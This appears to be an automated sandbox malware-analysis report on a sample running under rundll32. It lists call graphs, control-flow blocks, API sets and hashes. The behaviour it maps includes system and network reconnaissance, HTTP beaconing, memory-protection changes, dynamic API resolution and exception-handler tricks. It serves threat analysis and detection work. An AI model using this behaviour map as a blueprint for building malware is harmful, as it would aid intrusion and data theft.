InternetOpenW 17665->17666 17667 1b0a35b7885 17665->17667 17668 1b0a35b7ae3 17666->17668 17669 1b0a35b7898 InternetConnectW 17666->17669 17667->17666 17671 1b0a35b7b0e InternetCloseHandle 17668->17671 17674 1b0a35b7b17 17668->17674 17669->17668 17670 1b0a35b78dd HttpOpenRequestW 17669->17670 17670->17668 17672 1b0a35b7931 17670->17672 17671->17674 17672->17668 17673 1b0a35b79cb HttpSendRequestA 17672->17673 17673->17668 17676 1b0a35b79e4 17673->17676 17675 1b0a35b7a3f InternetQueryDataAvailable 17675->17668 17675->17676 17676->17668 17676->17675 18610 1b0a35d27b0 18611 1b0a35c2210 3 API calls 18610->18611 18612 1b0a35d27cb 18611->18612 18613 1b0a35c23d0 3 API calls 18612->18613 18614 1b0a35d27d0 18613->18614 18619 1b0a35becd0 18614->18619 18617 1b0a35c2c40 3 API calls 18618 1b0a35d27da 18617->18618 18621 1b0a35bece9 18619->18621 18620 1b0a35becf3 18620->18617 18621->18620 18622 1b0a35c77e0 2 API calls 18621->18622 18623 1b0a35bed42 18622->18623 18623->18620 18624 1b0a35bcce0 LdrGetProcedureAddress 18623->18624 18625 1b0a35bed5b 18624->18625 18626 1b0a35bcce0 LdrGetProcedureAddress 18625->18626 18626->18620 18846 1b0a35d4a30 18849 1b0a35d4550 18846->18849 18850 1b0a35d457c 18849->18850 18851 1b0a35d4a0b 18850->18851 18852 1b0a35c2c40 3 API calls 18850->18852 18853 1b0a35d458f 18852->18853 18854 1b0a35c12c0 3 API calls 18853->18854 18861 1b0a35d45a1 18854->18861 18855 1b0a35d462f 18856 1b0a35d48bd 18855->18856 18857 1b0a35e4be0 NtProtectVirtualMemory 18855->18857 18859 1b0a35ba230 3 API calls 18856->18859 18862 1b0a35d48db 18856->18862 18858 1b0a35d488f 18857->18858 18860 1b0a35e3a40 NtProtectVirtualMemory 18858->18860 18859->18862 18860->18856 18861->18855 18873 1b0a35bc7a0 18861->18873 18862->18851 18870 1b0a35e4740 NtFreeVirtualMemory 18862->18870 18864 1b0a35d474d 18864->18855 18865 1b0a35ba230 3 API calls 18864->18865 18866 1b0a35d477e 18865->18866 18866->18855 18867 1b0a35b4cd0 2 API calls 18866->18867 18868 1b0a35d4797 18867->18868 18868->18855 18869 1b0a35b4cd0 2 API calls 18868->18869 18872 1b0a35d47c4 18869->18872 18870->18851 18871 1b0a35ba230 3 API calls 18871->18855 18872->18855 18872->18871 18874 1b0a35bc7e6 18873->18874 18880 1b0a35bc7ee 18873->18880 18875 1b0a35c8fb0 3 API calls 18874->18875 18875->18880 18876 1b0a35c77e0 2 API calls 18876->18880 18877 1b0a35bc7f3 18877->18864 18878 1b0a35e4be0 NtProtectVirtualMemory 18879 1b0a35bc9de 18878->18879 18879->18877 18879->18878 18880->18876 18880->18877 18880->18879 18881 1b0a35bcce0 LdrGetProcedureAddress 18880->18881 18881->18880 18493 1b0a35def30 18495 1b0a35def54 18493->18495 18494 1b0a35df0ba 18495->18494 18496 1b0a35df060 18495->18496 18499 1b0a35ced90 18495->18499 18496->18494 18497 1b0a35ced90 3 API calls 18496->18497 18497->18494 18500 1b0a35c1440 3 API calls 18499->18500 18501 1b0a35cedb8 18500->18501 18501->18495 18375 1b0a35ca8eb 18376 1b0a35ca8fc 18375->18376 18382 1b0a35ca91e 18376->18382 18391 1b0a35c8fb0 18376->18391 18378 1b0a35caf0c 18381 1b0a35e4be0 NtProtectVirtualMemory 18378->18381 18379 1b0a35caf7a 18386 1b0a35cafc2 18379->18386 18387 1b0a35e4740 NtFreeVirtualMemory 18379->18387 18380 1b0a35ca930 18380->18378 18380->18379 18383 1b0a35caf45 18381->18383 18382->18380 18384 1b0a35e4be0 NtProtectVirtualMemory 18382->18384 18390 1b0a35caf78 18382->18390 18396 1b0a35cf100 18382->18396 18389 1b0a35e3a40 NtProtectVirtualMemory 18383->18389 18384->18382 18388 1b0a35e4740 NtFreeVirtualMemory 18386->18388 18387->18379 18388->18390 18389->18390 18392 1b0a35c77e0 2 API calls 18391->18392 18394 1b0a35c8fc4 18392->18394 18393 1b0a35c8fce 18393->18382 18394->18393 18395 1b0a35e4be0 NtProtectVirtualMemory 18394->18395 18395->18393 18398 1b0a35cf168 18396->18398 18397 1b0a35cf220 18397->18382 18398->18397 18399 1b0a35c77e0 2 API calls 18398->18399 18400 1b0a35cf28f 18399->18400 18400->18397 18401 1b0a35bcce0 LdrGetProcedureAddress 18400->18401 18401->18397 17741 1b0a35c77e0 17742 1b0a35c7800 17741->17742 17743 1b0a35c780d RtlAddVectoredExceptionHandler 17742->17743 17746 1b0a35c7805 17742->17746 17744 1b0a35c7827 17743->17744 17745 1b0a35c78f1 RtlRemoveVectoredExceptionHandler 17744->17745 17744->17746 17745->17746 18402 1b0a35cb4e0 18403 1b0a35c2d20 3 API calls 18402->18403 18404 1b0a35cb50d 18403->18404 18409 1b0a35c37a0 18404->18409 18406 1b0a35cb5ba 18407 1b0a35cb512 18407->18406 18429 1b0a35cfdb0 18407->18429 18410 1b0a35c37b9 18409->18410 18411 1b0a35c77e0 2 API calls 18410->18411 18413 1b0a35c37c3 18410->18413 18412 1b0a35c3812 18411->18412 18412->18413 18414 1b0a35bcce0 LdrGetProcedureAddress 18412->18414 18413->18407 18415 1b0a35c3832 18414->18415 18416 1b0a35bcce0 LdrGetProcedureAddress 18415->18416 18417 1b0a35c384d 18416->18417 18418 1b0a35bcce0 LdrGetProcedureAddress 18417->18418 18419 1b0a35c3876 18418->18419 18420 1b0a35bcce0 LdrGetProcedureAddress 18419->18420 18421 1b0a35c3895 18420->18421 18422 1b0a35bcce0 LdrGetProcedureAddress 18421->18422 18423 1b0a35c38b4 18422->18423 18424 1b0a35bcce0 LdrGetProcedureAddress 18423->18424 18425 1b0a35c38d3 18424->18425 18426 1b0a35bcce0 LdrGetProcedureAddress 18425->18426 18427 1b0a35c38f2 18426->18427 18428 1b0a35bcce0 LdrGetProcedureAddress 18427->18428 18428->18413 18430 1b0a35c37a0 3 API calls 18429->18430 18431 1b0a35cfde5 18430->18431 18431->18407 18432 1b0a35d5ae0 18434 1b0a35d5b01 18432->18434 18433 1b0a35d5c0f 18434->18433 18435 1b0a35b3c30 2 API calls 18434->18435 18435->18433 17747 1b0a35e4be0 17748 1b0a35e4c02 17747->17748 17749 1b0a35e4c5e 17748->17749 17750 1b0a35e4c5c NtProtectVirtualMemory 17748->17750 17750->17749 18502 1b0a35e2f60 18507 1b0a35c2210 18502->18507 18505 1b0a35c23d0 3 API calls 18506 1b0a35e2f86 18505->18506 18509 1b0a35c2227 18507->18509 18508 1b0a35c22a5 18510 1b0a35bcce0 LdrGetProcedureAddress 18508->18510 18509->18508 18512 1b0a35c77e0 2 API calls 18509->18512 18516 1b0a35c2231 18509->18516 18511 1b0a35c22c0 18510->18511 18513 1b0a35bcce0 LdrGetProcedureAddress 18511->18513 18514 1b0a35c2285 18512->18514 18515 1b0a35c22e9 18513->18515 18514->18516 18518 1b0a35bcce0 LdrGetProcedureAddress 18514->18518 18517 1b0a35bcce0 LdrGetProcedureAddress 18515->18517 18516->18505 18519 1b0a35c2308 18517->18519 18518->18508 18520 1b0a35bcce0 LdrGetProcedureAddress 18519->18520 18521 1b0a35c2327 18520->18521 18522 1b0a35bcce0 LdrGetProcedureAddress 18521->18522 18523 1b0a35c2346 18522->18523 18524 1b0a35bcce0 LdrGetProcedureAddress 18523->18524 18525 1b0a35c2365 18524->18525 18526 1b0a35bcce0 LdrGetProcedureAddress 18525->18526 18527 1b0a35c2384 18526->18527 18528 1b0a35bcce0 LdrGetProcedureAddress 18527->18528 18528->18516 18885 1b0a35ca650 18894 1b0a35ca671 18885->18894 18886 1b0a35caf0c 18888 1b0a35e4be0 NtProtectVirtualMemory 18886->18888 18887 1b0a35caf7a 18890 1b0a35cafc2 18887->18890 18891 1b0a35e4740 NtFreeVirtualMemory 18887->18891 18889 1b0a35caf45 18888->18889 18893 1b0a35e3a40 NtProtectVirtualMemory 18889->18893 18892 1b0a35e4740 NtFreeVirtualMemory 18890->18892 18891->18887 18895 1b0a35caf78 18892->18895 18893->18895 18894->18886 18894->18887 18894->18895 18442 1b0a35d44d0 18444 1b0a35d44ec 18442->18444 18443 1b0a35d452a 18444->18443 18445 1b0a35d7220 10 API calls 18444->18445 18445->18443 18896 1b0a35d4a50 18897 1b0a35d4550 7 API calls 18896->18897 18898 1b0a35d4a5f 18897->18898 18529 1b0a35df950 18531 1b0a35df96b 18529->18531 18530 1b0a35df9b8 18531->18530 18533 1b0a35c8820 18531->18533 18536 1b0a35c8894 18533->18536 18534 1b0a35c89b7 18534->18530 18535 1b0a35b2350 9 API calls 18535->18536 18536->18534 18536->18535

      Control-flow Graph

      • Executed
      • Not Executed
      control_flow_graph 0 1b0a35d4d00-1b0a35d4daf GetUserNameW GetComputerNameExW 1 1b0a35d4dc7-1b0a35d4df1 GetComputerNameExW call 1b0a35e4ad0 0->1 2 1b0a35d4db1-1b0a35d4dc1 call 1b0a35db4c0 0->2 7 1b0a35d4e58-1b0a35d4e92 call 1b0a35e2750 call 1b0a35cdfc0 1->7 8 1b0a35d4df3-1b0a35d4e1a GetTokenInformation 1->8 2->1 22 1b0a35d4eaa-1b0a35d4ed1 GetNativeSystemInfo 7->22 23 1b0a35d4e94-1b0a35d4ea5 call 1b0a35e3de0 7->23 9 1b0a35d4e1c-1b0a35d4e28 8->9 10 1b0a35d4e4e-1b0a35d4e53 call 1b0a35e4000 8->10 11 1b0a35d4e3e-1b0a35d4e49 call 1b0a35e3de0 9->11 12 1b0a35d4e2a-1b0a35d4e39 call 1b0a35e3de0 9->12 10->7 11->10 12->11 25 1b0a35d4ee8-1b0a35d4eec 22->25 26 1b0a35d4ed3-1b0a35d4ee6 22->26 23->22 28 1b0a35d4eee-1b0a35d4efd 25->28 29 1b0a35d4f17-1b0a35d4f2d call 1b0a35e3de0 25->29 27 1b0a35d4f01-1b0a35d4f15 call 1b0a35e3de0 26->27 33 1b0a35d4f32-1b0a35d4f42 27->33 28->27 29->33 35 1b0a35d4f89-1b0a35d4fb9 GetAdaptersInfo 33->35 36 1b0a35d4f44-1b0a35d4f84 call 1b0a35e3b90 call 1b0a35e3de0 call 1b0a35e3b90 * 2 33->36 41 1b0a35d4fdd-1b0a35d4fe3 35->41 42 1b0a35d4fbb-1b0a35d4fdc call 1b0a35db4e0 * 2 35->42 36->35 41->42 45 1b0a35d4fe5-1b0a35d4ffd call 1b0a35db4c0 GetAdaptersInfo 41->45 45->42 52 1b0a35d4fff-1b0a35d500c 45->52 55 1b0a35d5012-1b0a35d5015 52->55 55->42 56 1b0a35d5017-1b0a35d5018 55->56 57 1b0a35d501f-1b0a35d5031 call 1b0a35b93e0 56->57 60 1b0a35d5045-1b0a35d504c 57->60 61 1b0a35d5033-1b0a35d5043 call 1b0a35e3de0 57->61 60->42 63 1b0a35d5052-1b0a35d5062 call 1b0a35e3de0 60->63 61->57 63->55
      APIs
      Memory Dump Source
      • Source File: 00000009.00000002.3273232656.000001B0A35B1000.00000020.00001000.00020000.00000000.sdmp, Offset: 000001B0A35B1000, based on PE: false
      Joe Sandbox IDA Plugin
      • Snapshot File: hcaresult_9_2_1b0a35b1000_rundll32.jbxd
      Similarity
      • API ID: InfoName$AdaptersComputer$InformationNativeSystemTokenUser
      • String ID:
      • API String ID: 1596153048-0
      • Opcode ID: 97f414de48c75473fab4d7ded8ed9c9c815162e0241c79caef865829c24d2fb3
      • Instruction ID: 4ba5c714c8120f860050ff9ed9d6d92f0deb16946bac1cfb03b63753fb39afed
      • Opcode Fuzzy Hash: 97f414de48c75473fab4d7ded8ed9c9c815162e0241c79caef865829c24d2fb3
      • Instruction Fuzzy Hash: F5A1A730218B084FE755EB39D8967DBB7E5FB98340F40492DA44AC7291DFB8DA458B82

      Control-flow Graph

      APIs
      Strings
      Memory Dump Source
      • Source File: 00000009.00000002.3273232656.000001B0A35B1000.00000020.00001000.00020000.00000000.sdmp, Offset: 000001B0A35B1000, based on PE: false
      Joe Sandbox IDA Plugin
      • Snapshot File: hcaresult_9_2_1b0a35b1000_rundll32.jbxd
      Similarity
      • API ID: Thread32$CreateFirstNextSnapshotToolhelp32
      • String ID: 0
      • API String ID: 3779972765-4108050209
      • Opcode ID: 7d6ec060ca6ff104e599d54b27dc2336fbe3cd82a434029ae01abf51b05e4548
      • Instruction ID: 055ff8271526ab05cb6148a78bd67fb022ae4ca6c4666f3e516bfa6524c59626
      • Opcode Fuzzy Hash: 7d6ec060ca6ff104e599d54b27dc2336fbe3cd82a434029ae01abf51b05e4548
      • Instruction Fuzzy Hash: 3C718130218B488FE795EF79D485BEBB7E1FB88304F50496DA58DC3292DBB0D5458B42

      Control-flow Graph

      APIs
      Memory Dump Source
      • Source File: 00000009.00000002.3273232656.000001B0A35B1000.00000020.00001000.00020000.00000000.sdmp, Offset: 000001B0A35B1000, based on PE: false
      Joe Sandbox IDA Plugin
      • Snapshot File: hcaresult_9_2_1b0a35b1000_rundll32.jbxd
      Similarity
      • API ID: ExceptionHandlerVectored$Remove
      • String ID:
      • API String ID: 3670940754-0
      • Opcode ID: 7ab087cfcf78975a284b095aad224ccf15d9cc2dbaabd67c1079e5a8e1d1515c
      • Instruction ID: b3bbca6aa086e659cc123549f48e6e19f6bdc4c5b9cd0cd014d360c72094005d
      • Opcode Fuzzy Hash: 7ab087cfcf78975a284b095aad224ccf15d9cc2dbaabd67c1079e5a8e1d1515c
      • Instruction Fuzzy Hash: D331C330218B084FE75AAB3C9C9A2AB77E5F75C315F10462EE847C35E1DFA4D802C686

      Control-flow Graph

      APIs
      Memory Dump Source
      • Source File: 00000009.00000002.3273232656.000001B0A35B1000.00000020.00001000.00020000.00000000.sdmp, Offset: 000001B0A35B1000, based on PE: false
      Joe Sandbox IDA Plugin
      • Snapshot File: hcaresult_9_2_1b0a35b1000_rundll32.jbxd
      Similarity
      • API ID: AddressProcedure
      • String ID:
      • API String ID: 3653107232-0
      • Opcode ID: 64a4c363e66e8fcb324c2d013a85a570e217f1f41a485886b1e3891cf8e103dc
      • Instruction ID: 11d3cfcaad059b56e5c89a30165dca91fe253c2e4761610c3641238a8ad65cd6
      • Opcode Fuzzy Hash: 64a4c363e66e8fcb324c2d013a85a570e217f1f41a485886b1e3891cf8e103dc
      • Instruction Fuzzy Hash: 9131A335118B484BD7649E28DC867FBB7E4FB8A310F500A1EE586C3251E760A84587C6

      Control-flow Graph

      • Executed
      • Not Executed
      control_flow_graph 67 1b0a35b7830-1b0a35b7883 68 1b0a35b788a-1b0a35b7892 InternetOpenW 67->68 69 1b0a35b7885-1b0a35b7888 67->69 70 1b0a35b7af9-1b0a35b7afd 68->70 71 1b0a35b7898-1b0a35b78d7 InternetConnectW 68->71 69->68 72 1b0a35b7aff-1b0a35b7b0c 70->72 71->70 73 1b0a35b78dd-1b0a35b792b HttpOpenRequestW 71->73 74 1b0a35b7b0e-1b0a35b7b11 InternetCloseHandle 72->74 75 1b0a35b7b17-1b0a35b7b1a 72->75 73->72 76 1b0a35b7931-1b0a35b793b 73->76 74->75 79 1b0a35b7b1c-1b0a35b7b1d 75->79 80 1b0a35b7b25-1b0a35b7b28 75->80 77 1b0a35b793d-1b0a35b7945 76->77 78 1b0a35b7990-1b0a35b79ab 76->78 77->78 81 1b0a35b7947-1b0a35b798b call 1b0a35e2750 * 2 77->81 78->72 90 1b0a35b79b1-1b0a35b79ba 78->90 79->80 82 1b0a35b7b2a-1b0a35b7b2b 80->82 83 1b0a35b7b33-1b0a35b7b3b 80->83 81->78 82->83 84 1b0a35b7b41-1b0a35b7b4b 83->84 85 1b0a35b7bd0-1b0a35b7be3 83->85 88 1b0a35b7b4d-1b0a35b7b54 call 1b0a35e1230 84->88 89 1b0a35b7b62-1b0a35b7b73 84->89 88->89 102 1b0a35b7b56-1b0a35b7b60 call 1b0a35db4e0 88->102 95 1b0a35b7b7a-1b0a35b7b8a call 1b0a35bcb60 89->95 96 1b0a35b7b75-1b0a35b7b78 89->96 93 1b0a35b79bc-1b0a35b79de call 1b0a35e1270 HttpSendRequestA 90->93 94 1b0a35b79e6-1b0a35b7a0a 90->94 93->72 108 1b0a35b79e4-1b0a35b7a16 93->108 111 1b0a35b7a0c 94->111 109 1b0a35b7bba-1b0a35b7bce call 1b0a35e1410 95->109 110 1b0a35b7b8c-1b0a35b7bb8 call 1b0a35ba050 call 1b0a35db4e0 95->110 96->85 96->95 102->85 117 1b0a35b7a18-1b0a35b7a1f call 1b0a35db4e0 108->117 118 1b0a35b7a24-1b0a35b7a3b call 1b0a35db4c0 108->118 109->85 109->102 110->85 111->93 117->118 125 1b0a35b7a3f-1b0a35b7a5b InternetQueryDataAvailable 118->125 126 1b0a35b7ae3-1b0a35b7af7 call 1b0a35db4e0 125->126 127 1b0a35b7a61-1b0a35b7a69 125->127 126->74 127->126 129 1b0a35b7a6b-1b0a35b7a7e 127->129 129->126 132 1b0a35b7a80-1b0a35b7a86 129->132 132->126 133 1b0a35b7a88-1b0a35b7a96 132->133 134 1b0a35b7a98-1b0a35b7aaa 133->134 135 1b0a35b7aac-1b0a35b7aaf call 1b0a35db4c0 133->135 137 1b0a35b7ab4-1b0a35b7ade call 1b0a35d44a0 134->137 135->137 137->125
      APIs
      Memory Dump Source
      • Source File: 00000009.00000002.3273232656.000001B0A35B1000.00000020.00001000.00020000.00000000.sdmp, Offset: 000001B0A35B1000, based on PE: false
      Joe Sandbox IDA Plugin
      • Snapshot File: hcaresult_9_2_1b0a35b1000_rundll32.jbxd
      Similarity
      • API ID: Internet$HttpOpenRequest$AvailableCloseConnectDataHandleQuerySend
      • String ID:
      • API String ID: 305742638-0
      • Opcode ID: 488b002841e1bd412dd0cc874d8b1d67b82a8a3cb49ca359c288d6713fbca809
      • Instruction ID: 0a9f9a56f5591827495604cedee59ab93b4c9ba99aa374f93d48b315297c9f1a
      • Opcode Fuzzy Hash: 488b002841e1bd412dd0cc874d8b1d67b82a8a3cb49ca359c288d6713fbca809
      • Instruction Fuzzy Hash: 2FB18330218B088BE755EF3CD8957ABB7E5FF98340F14496DA84AC7291EFB4D9418782
      Strings
      Memory Dump Source
      • Source File: 00000009.00000003.2136799386.000001B0A3570000.00000040.00001000.00020000.00000000.sdmp, Offset: 000001B0A3570000, based on PE: false
      Joe Sandbox IDA Plugin
      • Snapshot File: hcaresult_9_3_1b0a3570000_rundll32.jbxd
      Similarity
      • API ID:
      • String ID:
      • API String ID: 0-3916222277
      • Opcode ID: e1b5f217ab961a454b36722efd1ce63e8d0791c74eab14a614d4f9e3fc2a9a33
      • Instruction ID: 0c1e28b45ea7ca56466ac39dc4ce827f5ba664c67e9836d6f4974b7c26248020
      • Opcode Fuzzy Hash: e1b5f217ab961a454b36722efd1ce63e8d0791c74eab14a614d4f9e3fc2a9a33
      • Instruction Fuzzy Hash: 13B1B73161CB088FDB54EF2CC885BAAB7E1FB98310F404A6DE44AC7251DB74E945CB82

      Control-flow Graph

      APIs
      Memory Dump Source
      • Source File: 00000009.00000002.3273232656.000001B0A35B1000.00000020.00001000.00020000.00000000.sdmp, Offset: 000001B0A35B1000, based on PE: false
      Joe Sandbox IDA Plugin
      • Snapshot File: hcaresult_9_2_1b0a35b1000_rundll32.jbxd
      Similarity
      • API ID: Fiber$CreateDelete
      • String ID:
      • API String ID: 2527733159-0
      • Opcode ID: 93f026081dbdd0704688566a40b49887aa3b7977c0bffc28660abc2339b77c2a
      • Instruction ID: 56ba95b49508827bb525aad12212c5592e64c7b3cab3d89debfff55a79da35e7
      • Opcode Fuzzy Hash: 93f026081dbdd0704688566a40b49887aa3b7977c0bffc28660abc2339b77c2a
      • Instruction Fuzzy Hash: 4851D831618B144BE7ADAF3C98957A673D1FB58315F201629E89BC31D1DB749C4287C2

      Control-flow Graph

      APIs
      Memory Dump Source
      • Source File: 00000009.00000002.3273232656.000001B0A35B1000.00000020.00001000.00020000.00000000.sdmp, Offset: 000001B0A35B1000, based on PE: false
      Joe Sandbox IDA Plugin
      • Snapshot File: hcaresult_9_2_1b0a35b1000_rundll32.jbxd
      Similarity
      • API ID: CreateMutex
      • String ID:
      • API String ID: 1964310414-0
      • Opcode ID: 6f5cb151aadba70b4aa6e5bafaf7101ce807ceecab62b3beafb4f2b699b4b3ec
      • Instruction ID: 822493b199a1ca4853018cab78bd2007314dfbeb2d915cf6b59fd8e26ffc3259
      • Opcode Fuzzy Hash: 6f5cb151aadba70b4aa6e5bafaf7101ce807ceecab62b3beafb4f2b699b4b3ec
      • Instruction Fuzzy Hash: 1DE12171418A0D8FE751EF18E895BE6B7F4F768380F20067BE84AC3161DB789245CB86
      APIs
      Memory Dump Source
      • Source File: 00000009.00000003.2136799386.000001B0A3570000.00000040.00001000.00020000.00000000.sdmp, Offset: 000001B0A3570000, based on PE: false
      Joe Sandbox IDA Plugin
      • Snapshot File: hcaresult_9_3_1b0a3570000_rundll32.jbxd
      Similarity
      • API ID: AllocateHeap
      • String ID:
      • API String ID: 1279760036-0
      • Opcode ID: dda5bd23e4ac47bd42f6dd929fb15fd9a0e68714a6453c9134859c40f5c4eed3
      • Instruction ID: 1d121763a2955ff0c50a3ef2eda0bf8fff4baf10bef5fbfe4b39cd038cbb95de
      • Opcode Fuzzy Hash: dda5bd23e4ac47bd42f6dd929fb15fd9a0e68714a6453c9134859c40f5c4eed3
      • Instruction Fuzzy Hash: 78012D30A19B1A0BE7DBA77D68C4BE377C1F79E350F5445A5D80AC7246DB64CC514380